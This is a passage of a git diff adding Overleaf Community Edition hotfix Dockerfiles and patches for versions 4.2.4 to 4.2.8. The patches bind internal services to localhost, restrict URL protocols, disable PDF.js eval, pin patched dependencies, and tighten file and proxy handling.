++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-projects.sh ++++ delete-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-users.sh ++++ delete-users.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- project-history-periodic-flush.sh ++++ project-history-periodic-flush.sh +@@ -7,6 +7,6 @@ echo "Flush project-history queue" + echo "--------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/flush/old?timeout=3600000&limit=5000&background=1" +--- project-history-retry-hard.sh ++++ project-history-retry-hard.sh +@@ -7,6 +7,6 @@ echo "Retry project-history errors (hard)" + echo "-----------------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" +--- project-history-retry-soft.sh ++++ project-history-retry-soft.sh +@@ -6,6 +6,6 @@ echo "-----------------------------------" + echo "Retry project-history errors (soft)" + echo "-----------------------------------" + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/4.2.4/pr_17601-3.patch b/server-ce/hotfix/4.2.4/pr_17601-3.patch new file mode 100644 index 0000000..de64af5 --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17601-3.patch @@ -0,0 +1,118 @@ +--- chat-sharelatex/run ++++ chat-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30100" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/chat/app.js >> /var/log/sharelatex/chat.log 2>&1 +--- clsi-sharelatex/run ++++ clsi-sharelatex/run +@@ -15,4 +15,7 @@ if [ -e '/var/run/docker.sock' ]; then + usermod -aG dockeronhost www-data + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/clsi/app.js >> /var/log/sharelatex/clsi.log 2>&1 +--- contacts-sharelatex/run ++++ contacts-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30360" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/contacts/app.js >> /var/log/sharelatex/contacts.log 2>&1 +--- docstore-sharelatex/run ++++ docstore-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30160" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/docstore/app.js >> 
/var/log/sharelatex/docstore.log 2>&1 +--- document-updater-sharelatex/run ++++ document-updater-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30030" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/document-updater/app.js >> /var/log/sharelatex/document-updater.log 2>&1 +--- filestore-sharelatex/run ++++ filestore-sharelatex/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/filestore/app.js >> /var/log/sharelatex/filestore.log 2>&1 +--- notifications-sharelatex/run ++++ notifications-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30420" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/notifications/app.js >> /var/log/sharelatex/notifications.log 2>&1 +--- project-history-sharelatex/run ++++ project-history-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30540" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/project-history/app.js >> /var/log/sharelatex/project-history.log 2>&1 +--- real-time-sharelatex/run ++++ real-time-sharelatex/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/real-time/app.js >> /var/log/sharelatex/real-time.log 2>&1 +--- spelling-sharelatex/run ++++ spelling-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30050" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/spelling/app.js >> /var/log/sharelatex/spelling.log 2>&1 +--- web-api-sharelatex/run ++++ web-api-sharelatex/run +@@ -6,6 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30000" + fi + ++source /etc/sharelatex/env.sh + export LISTEN_ADDRESS=0.0.0.0 + export ENABLED_SERVICES="api" + export METRICS_APP_NAME="web-api" +--- web-sharelatex/run ++++ web-sharelatex/run +@@ -6,6 +6,8 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:40000" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 + export ENABLED_SERVICES="web" + export WEB_PORT="4000" diff --git a/server-ce/hotfix/4.2.4/pr_17885.patch b/server-ce/hotfix/4.2.4/pr_17885.patch new file mode 100644 index 0000000..d9816eb --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17885.patch @@ -0,0 +1,33 @@ +--- 00_close_site ++++ 00_close_site +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/sharelatex/env.sh ++ + SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + + mv "${SITE_MAINTENANCE_FILE}" "${SITE_MAINTENANCE_FILE_BAK}" +--- 01_flush_document_updater ++++ 01_flush_document_updater +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/sharelatex/env.sh ++ + cd /overleaf/services/document-updater && node scripts/flush_all.js >> /var/log/sharelatex/document-updater.log 2>&1 + + EXIT_CODE="$?" 
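The pr_17601 patches and env.sh above pin every internal service URL to 127.0.0.1. The background, as a small check script: from Node 17 onward, dns.lookup() returns addresses in the order the resolver provides them instead of reordering IPv4 first, so 'localhost' can resolve to ::1 while the services listen only on IPv4. (Plain Node stdlib; the printed output is illustrative.)

const dns = require('dns')

// prints resolver-order results; on many systems the first entry for
// 'localhost' is ::1, which the hotfix sidesteps by hardcoding 127.0.0.1
dns.lookup('localhost', { all: true }, (err, addresses) => {
  if (err) throw err
  console.log(addresses) // e.g. [ { address: '::1', family: 6 }, { address: '127.0.0.1', family: 4 } ]
})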
+--- 02_flush_project_history ++++ 02_flush_project_history +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/sharelatex/env.sh ++ + cd /overleaf/services/project-history && node scripts/flush_all.js >> /var/log/sharelatex/project-history.log 2>&1 + + EXIT_CODE="$?" diff --git a/server-ce/hotfix/4.2.5/Dockerfile b/server-ce/hotfix/4.2.5/Dockerfile new file mode 100644 index 0000000..b140c0d --- /dev/null +++ b/server-ce/hotfix/4.2.5/Dockerfile @@ -0,0 +1,29 @@ +FROM sharelatex/sharelatex:4.2.4 + +# apply an override to the swagger-tools package to force security updates to multer and qs +# from https://github.com/overleaf/internal/pull/18433 +COPY pr_18433.patch . +RUN patch -p1 < pr_18433.patch && rm pr_18433.patch +RUN npm install --include-workspace-root -w services/history-v1 swagger-tools@0.10.4 && rm -rf /root/.cache /root/.npm $(find /tmp/ -mindepth 1 -maxdepth 1) + +# remove google-cloud packages which are unused in server-pro have a vulnerable dependency +RUN npm uninstall -w libraries/logger @google-cloud/logging-bunyan +RUN npm uninstall -w libraries/metrics @google-cloud/opentelemetry-cloud-trace-exporter @google-cloud/profiler + +# the passport-twitter package has been removed from the monorepo +RUN npm uninstall -w services/web passport-twitter + +# remove the unused services/web/scripts/translations directory +RUN rm -r services/web/scripts/translations + +COPY pr_18393.patch . +RUN patch -p1 < pr_18393.patch && rm pr_18393.patch +COPY pr_18444.patch . +RUN patch -p1 < pr_18444.patch && rm pr_18444.patch +COPY pr_18819.patch . +RUN patch -p1 < pr_18819.patch && rm pr_18819.patch +COPY pr_18570.patch . +RUN patch -p1 < pr_18570.patch && rm pr_18570.patch + +# Recompile frontend assets +RUN node genScript compile | bash diff --git a/server-ce/hotfix/4.2.5/pr_18393.patch b/server-ce/hotfix/4.2.5/pr_18393.patch new file mode 100644 index 0000000..5af1af7 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18393.patch @@ -0,0 +1,111 @@ +diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx +index a0d681d9cb5..2f9a4333cd6 100644 +--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx ++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx +@@ -17,6 +17,7 @@ import { + import { Button, ControlLabel, FormControl, FormGroup } from 'react-bootstrap' + import Icon from '../../../../shared/components/icon' + import { EditorState } from '@codemirror/state' ++import { openURL } from '@/features/source-editor/utils/url' + + export const HrefTooltipContent: FC = () => { + const state = useCodeMirrorStateContext() +@@ -108,7 +109,7 @@ export const HrefTooltipContent: FC = () => { + className="ol-cm-command-tooltip-link" + onClick={() => { + // TODO: unescape content +- window.open(url, '_blank') ++ openURL(url) + }} + > + +diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx +index c51b497de01..632d71dd031 100644 +--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx ++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx +@@ -9,6 +9,7 @@ import { + } from '../../lezer-latex/latex.terms.mjs' + import Icon from 
'../../../../shared/components/icon' + import { EditorState } from '@codemirror/state' ++import { openURL } from '@/features/source-editor/utils/url' + + export const UrlTooltipContent: FC = () => { + const { t } = useTranslation() +@@ -23,7 +24,7 @@ export const UrlTooltipContent: FC = () => { + onClick={() => { + const url = readUrl(state) + if (url) { +- window.open(url, '_blank') ++ openURL(url) + } + }} + > +diff --git a/services/web/frontend/js/features/source-editor/utils/url.ts b/services/web/frontend/js/features/source-editor/utils/url.ts +new file mode 100644 +index 00000000000..8bfc9bdeab8 +--- /dev/null ++++ b/services/web/frontend/js/features/source-editor/utils/url.ts +@@ -0,0 +1,11 @@ ++const ALLOWED_PROTOCOLS = ['https:', 'http:'] ++ ++export const openURL = (content: string) => { ++ const url = new URL(content, document.location.href) ++ ++ if (!ALLOWED_PROTOCOLS.includes(url.protocol)) { ++ throw new Error(`Not opening URL with protocol ${url.protocol}`) ++ } ++ ++ window.open(url, '_blank') ++} +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +index 837f90a64ab..d46b522a116 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +@@ -54,8 +54,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + +@@ -112,8 +112,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +index c6e28f9eeeb..106a80ba187 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +@@ -42,8 +42,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com/foo', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/foo'), + '_blank' + ) + cy.findByRole('button', { name: 'Remove link' }).click() +@@ -62,8 +62,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) diff --git a/server-ce/hotfix/4.2.5/pr_18433.patch 
b/server-ce/hotfix/4.2.5/pr_18433.patch new file mode 100644 index 0000000..1e14f23 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18433.patch @@ -0,0 +1,63 @@ +diff --git a/package-lock.json b/package-lock.json +index b9eba6086b..bb1a5cebaf 100644 +--- a/package-lock.json ++++ b/package-lock.json +@@ -70674,8 +70674,7 @@ + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "multer": { +- "version": "1.4.4", +- "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", ++ "version": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", + "integrity": "sha512-2wY2+xD4udX612aMqMcB8Ws2Voq6NIUPEtD1be6m411T4uDH/VtL9i//xvcyFlTVfRdaBsk7hV5tgrGQqhuBiw==", + "requires": { + "append-field": "^1.0.0", +@@ -76995,10 +76994,10 @@ + "js-yaml": "^3.3.1", + "json-refs": "^3.0.2", + "lodash": "^4.17.4", +- "multer": "^1.1.0", ++ "multer": "1.4.5-lts.1", + "parseurl": "^1.3.0", + "path-to-regexp": "^2.0.0", +- "qs": "^6.0.3", ++ "qs": "6.5.3", + "serve-static": "^1.10.0", + "spark-md5": "^3.0.0", + "superagent": "^3.5.2", +@@ -77035,7 +77034,7 @@ + "http-errors": "~1.6.2", + "iconv-lite": "0.4.19", + "on-finished": "~2.3.0", +- "qs": "6.5.1", ++ "qs": "6.5.3", + "raw-body": "2.3.2", + "type-is": "~1.6.15" + }, +@@ -77109,8 +77108,7 @@ + "integrity": "sha512-G6zHoVqC6GGTQkZwF4lkuEyMbVOjoBKAEybQUypI1WTkqinCOrq2x6U2+phkJ1XsEMTy4LjtwPI7HW+NVrRR2w==" + }, + "qs": { +- "version": "6.5.1", +- "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", ++ "version": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", + "integrity": "sha512-eRzhrN1WSINYCDCbrz796z37LOe3m5tmW7RQf6oBntukAG1nmovJvhnwHHRMAfeoItc1m2Hk02WER2aQ/iqs+A==" + }, + "raw-body": { +diff --git a/package.json b/package.json +index f092472caf..329d4fc5ce 100644 +--- a/package.json ++++ b/package.json +@@ -1,6 +1,12 @@ + { + "name": "overleaf", + "private": true, ++ "overrides": { ++ "swagger-tools": { ++ "multer": "1.4.5-lts.1", ++ "qs": "6.5.3" ++ } ++ }, + "dependencies": { + "patch-package": "^8.0.0" + }, diff --git a/server-ce/hotfix/4.2.5/pr_18444.patch b/server-ce/hotfix/4.2.5/pr_18444.patch new file mode 100644 index 0000000..e79fe18 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18444.patch @@ -0,0 +1,41 @@ +diff --git a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +index 4d3b80bb9a2..3efc61a2199 100644 +--- a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx ++++ b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +@@ -33,7 +33,10 @@ const FileViewPdf: FC<{ + return + } + +- const pdf = await PDFJS.getDocument(preview.url).promise ++ const pdf = await PDFJS.getDocument({ ++ url: preview.url, ++ isEvalSupported: false, ++ }).promise + + // bail out if loading the PDF took too long + if (!mountedRef.current) { +diff --git a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +index 9b419b1397f..6a92630a215 100644 +--- a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js ++++ b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +@@ -96,6 +96,7 @@ export default class PDFJSWrapper { + rangeChunkSize, + disableAutoFetch: true, + disableStream, ++ isEvalSupported: false, + textLayerMode: 2, // PDFJSViewer.TextLayerMode.ENABLE, + range: rangeTransport, + }) +diff --git 
a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +index 7321f9e02b5..f6c744aaec2 100644 +--- a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts ++++ b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +@@ -143,7 +143,7 @@ export class GraphicsWidget extends WidgetType { + return + } + +- const pdf = await PDFJS.getDocument(url).promise ++ const pdf = await PDFJS.getDocument({ url, isEvalSupported: false }).promise + const page = await pdf.getPage(1) + + // bail out if loading the PDF took too long diff --git a/server-ce/hotfix/4.2.5/pr_18570.patch b/server-ce/hotfix/4.2.5/pr_18570.patch new file mode 100644 index 0000000..05bc9f5 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18570.patch @@ -0,0 +1,30 @@ +--- a/genScript.js ++++ b/genScript.js +@@ -5,16 +5,26 @@ console.log('set -ex') + + switch (process.argv.pop()) { + case 'install': +- console.log('npm ci') ++ console.log('npm install --omit=dev') + break + case 'compile': + for (const service of services) { + console.log('pushd', `services/${service.name}`) + switch (service.name) { + case 'web': ++ // Avoid downloading of cypress ++ console.log('export CYPRESS_INSTALL_BINARY=0') ++ ++ // install webpack and frontend dependencies ++ console.log('npm install --include=dev') ++ // install misplaced dependencies (fixed via 18389) ++ console.log('pushd ../../ && npm install --include=dev --workspaces=false && popd') ++ // run webpack + console.log('npm run webpack:production') + // drop webpack/babel cache + console.log('rm -rf node_modules/.cache') ++ // uninstall webpack and frontend dependencies ++ console.log('pushd ../../ && npm install --omit=dev && popd') + break + default: + console.log(`echo ${service.name} does not require a compilation`) diff --git a/server-ce/hotfix/4.2.5/pr_18819.patch b/server-ce/hotfix/4.2.5/pr_18819.patch new file mode 100644 index 0000000..858c044 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18819.patch @@ -0,0 +1,17 @@ +--- a/services/web/frontend/js/features/mathjax/load-mathjax.ts ++++ b/services/web/frontend/js/features/mathjax/load-mathjax.ts +@@ -36,6 +36,15 @@ export const loadMathJax = async () => { + }, + startup: { + typeset: false, ++ ready() { ++ window.MathJax.startup.defaultReady() ++ const safe = window.MathJax.startup.document.safe ++ safe.filterAttributes.set('fontfamily', 'filterFontFamily') ++ safe.filterMethods.filterFontFamily = ( ++ _safe: any, ++ family: string ++ ) => family.split(/;/)[0] ++ }, + }, + } diff --git a/server-ce/hotfix/4.2.6/Dockerfile b/server-ce/hotfix/4.2.6/Dockerfile new file mode 100644 index 0000000..87c3853 --- /dev/null +++ b/server-ce/hotfix/4.2.6/Dockerfile @@ -0,0 +1,3 @@ +FROM sharelatex/sharelatex:4.2.5 + +# Server Pro only hotfix diff --git a/server-ce/hotfix/4.2.7/Dockerfile b/server-ce/hotfix/4.2.7/Dockerfile new file mode 100644 index 0000000..088bd4d --- /dev/null +++ b/server-ce/hotfix/4.2.7/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:4.2.6 + +COPY pr_19293.patch . +RUN patch -p1 < pr_19293.patch && rm pr_19293.patch + +COPY pr_19296.patch . +RUN patch -p1 < pr_19296.patch && rm pr_19296.patch + +COPY pr_19297.patch . +RUN patch -p1 < pr_19297.patch && rm pr_19297.patch + +COPY pr_19071.patch . 
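pr_18444 above adds isEvalSupported: false to every PDFJS.getDocument() call. With the flag off, PDF.js interprets PostScript functions embedded in a document itself rather than compiling them with eval/new Function, so a crafted PDF cannot smuggle code into that path. A minimal sketch, assuming the pdfjs-dist entry point resolves as below (loadFirstPage is illustrative):

const PDFJS = require('pdfjs-dist')

// isEvalSupported: false forces the slower interpreted path for embedded
// PostScript functions instead of eval/new Function compilation
async function loadFirstPage(url) {
  const pdf = await PDFJS.getDocument({ url, isEvalSupported: false }).promise
  return pdf.getPage(1)
}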
+RUN patch -p1 < pr_19071.patch && rm pr_19071.patch diff --git a/server-ce/hotfix/4.2.7/pr_19071.patch b/server-ce/hotfix/4.2.7/pr_19071.patch new file mode 100644 index 0000000..2e925e8 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19071.patch @@ -0,0 +1,37 @@ +--- a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js ++++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js +@@ -7,13 +7,16 @@ const UserGetter = require('../User/UserGetter') + const ProjectGetter = require('../Project/ProjectGetter') + const Crypto = require('crypto') + const NotificationsBuilder = require('../Notifications/NotificationsBuilder') ++const _ = require('lodash') + + const randomBytes = promisify(Crypto.randomBytes) + + const CollaboratorsInviteHandler = { + async getAllInvites(projectId) { + logger.debug({ projectId }, 'fetching invites for project') +- const invites = await ProjectInvite.find({ projectId }).exec() ++ const invites = await ProjectInvite.find({ projectId }) ++ .select('_id email sendingUserId projectId privileges createdAt expires') ++ .exec() + logger.debug( + { projectId, count: invites.length }, + 'found invites for project' +@@ -101,7 +104,15 @@ const CollaboratorsInviteHandler = { + logger.err({ err, projectId, email }, 'error sending messages for invite') + }) + +- return invite ++ return _.pick(invite.toObject(), [ ++ 'email', ++ 'sendingUserId', ++ 'projectId', ++ 'privileges', ++ '_id', ++ 'createdAt', ++ 'expires', ++ ]) + }, + + async revokeInvite(projectId, inviteId) { diff --git a/server-ce/hotfix/4.2.7/pr_19293.patch b/server-ce/hotfix/4.2.7/pr_19293.patch new file mode 100644 index 0000000..3a9c7d0 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19293.patch @@ -0,0 +1,17 @@ +--- a/services/clsi/app/js/StaticServerForbidSymlinks.js ++++ b/services/clsi/app/js/StaticServerForbidSymlinks.js +@@ -25,9 +25,13 @@ module.exports = ForbidSymlinks = function (staticFn, root, options) { + let file, projectId, result + const path = req.url + // check that the path is of the form /project_id_or_name/path/to/file.log +- if ((result = path.match(/^\/?([a-zA-Z0-9_-]+)\/(.*)/))) { ++ if ((result = path.match(/^\/([a-zA-Z0-9_-]+)\/(.*)$/s))) { + projectId = result[1] + file = result[2] ++ if (path !== `/${projectId}/${file}`) { ++ logger.warn({ path }, 'unrecognized file request') ++ return res.sendStatus(404) ++ } + } else { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) diff --git a/server-ce/hotfix/4.2.7/pr_19296.patch b/server-ce/hotfix/4.2.7/pr_19296.patch new file mode 100644 index 0000000..578c488 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19296.patch @@ -0,0 +1,22 @@ +--- a/services/clsi/app/js/LatexRunner.js ++++ b/services/clsi/app/js/LatexRunner.js +@@ -110,11 +110,14 @@ function _writeLogOutput(projectId, directory, output, callback) { + // internal method for writing non-empty log files + function _writeFile(file, content, cb) { + if (content && content.length > 0) { +- fs.writeFile(file, content, err => { +- if (err) { +- logger.error({ err, projectId, file }, 'error writing log file') // don't fail on error +- } +- cb() ++ fs.unlink(file, () => { ++ fs.writeFile(file, content, { flag: 'wx' }, err => { ++ if (err) { ++ // don't fail on error ++ logger.error({ err, projectId, file }, 'error writing log file') ++ } ++ cb() ++ }) + }) + } else { + cb() diff --git a/server-ce/hotfix/4.2.7/pr_19297.patch b/server-ce/hotfix/4.2.7/pr_19297.patch new file mode 100644 index 0000000..2e46183 --- /dev/null +++ 
b/server-ce/hotfix/4.2.7/pr_19297.patch @@ -0,0 +1,70 @@ +--- a/services/web/app/src/Features/Spelling/SpellingController.js ++++ b/services/web/app/src/Features/Spelling/SpellingController.js +@@ -28,39 +28,35 @@ module.exports = { + }) + }, + +- proxyRequestToSpellingApi(req, res) { ++ proxyCheckRequestToSpellingApi(req, res) { + const { language } = req.body + +- let url = req.url.slice('/spelling'.length) +- +- if (url === '/check') { +- if (!language) { +- logger.error('"language" field should be included for spell checking') +- return res.status(422).json({ misspellings: [] }) +- } ++ if (!language) { ++ logger.error({}, '"language" field should be included for spell checking') ++ return res.status(422).json({ misspellings: [] }) ++ } + +- if (!languageCodeIsSupported(language)) { +- // this log statement can be changed to 'error' once projects with +- // unsupported languages are removed from the DB +- logger.debug({ language }, 'language not supported') +- return res.status(422).json({ misspellings: [] }) +- } ++ if (!languageCodeIsSupported(language)) { ++ // this log statement can be changed to 'error' once projects with ++ // unsupported languages are removed from the DB ++ logger.debug({ language }, 'language not supported') ++ return res.status(422).json({ misspellings: [] }) + } + + const userId = SessionManager.getLoggedInUserId(req.session) +- url = `/user/${userId}${url}` ++ const url = `${Settings.apis.spelling.url}/user/${userId}/check` + req.headers.Host = Settings.apis.spelling.host + return request({ +- url: Settings.apis.spelling.url + url, +- method: req.method, ++ url, ++ method: 'POST', + headers: req.headers, + json: req.body, + timeout: TEN_SECONDS, + }) + .on('error', function (error) { +- logger.error({ err: error }, 'Spelling API error') ++ logger.error({ err: error }, 'Spelling Check API error') + return res.status(500).end() + }) + .pipe(res) + }, +-} ++} +\ No newline at end of file + +--- a/services/web/app/src/router.js ++++ b/services/web/app/src/router.js +@@ -1083,7 +1083,7 @@ function initialize(webRouter, privateApiRouter, publicApiRouter) { + webRouter.post( + '/spelling/check', + AuthenticationController.requireLogin(), +- SpellingController.proxyRequestToSpellingApi ++ SpellingController.proxyCheckRequestToSpellingApi + ) + webRouter.post( + '/spelling/learn', diff --git a/server-ce/hotfix/4.2.8/Dockerfile b/server-ce/hotfix/4.2.8/Dockerfile new file mode 100644 index 0000000..a2dbe4f --- /dev/null +++ b/server-ce/hotfix/4.2.8/Dockerfile @@ -0,0 +1,11 @@ +FROM sharelatex/sharelatex:4.2.7 + +# Fix crash on invalid URLs +COPY pr_19612.patch . +RUN patch -p1 < pr_19612.patch && rm pr_19612.patch + +COPY pr_19550.patch .
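pr_19297 above replaces a proxy that forwarded a client-controlled slice of req.url to the spelling service with a handler that can only ever build one fixed endpoint. The shape of the fix as a sketch, assuming the same request library the controller uses (checkSpelling is illustrative):

function checkSpelling(spellingApiUrl, userId, body) {
  // only this one fully-specified endpoint can be reached on the user's
  // behalf; the old proxy appended a client-controlled suffix of req.url
  return request({
    url: `${spellingApiUrl}/user/${userId}/check`,
    method: 'POST',
    json: body,
    timeout: 10 * 1000,
  })
}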
+RUN patch -p1 < pr_19550.patch && rm pr_19550.patch
+
+COPY is_19575.patch /etc/nginx/sites-enabled/
+RUN cd /etc/nginx/sites-enabled && patch -p0 < is_19575.patch && rm is_19575.patch
diff --git a/server-ce/hotfix/4.2.8/is_19575.patch b/server-ce/hotfix/4.2.8/is_19575.patch
new file mode 100644
index 0000000..5854d85
--- /dev/null
+++ b/server-ce/hotfix/4.2.8/is_19575.patch
@@ -0,0 +1,19 @@
+--- sharelatex.conf
++++ sharelatex.conf
+@@ -67,6 +67,16 @@ server {
+     proxy_http_version 1.1;
+   }
+
++  # block external access to metrics
